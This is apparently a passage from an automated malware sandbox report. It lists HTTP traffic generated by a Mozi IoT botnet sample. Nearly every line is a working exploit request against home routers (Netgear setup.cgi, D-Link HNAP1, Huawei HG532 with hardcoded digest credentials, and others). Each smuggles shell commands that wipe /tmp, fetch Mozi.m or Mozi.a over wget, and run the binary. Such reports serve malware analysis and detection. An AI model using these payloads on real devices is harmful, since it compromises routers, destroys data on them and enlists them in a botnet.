/tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 24.60.83.178:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 76.133.151.50:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 158.133.3.184:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 117.184.53.182:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 82.146.61.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 109.25.203.105:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 92.101.144.171:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
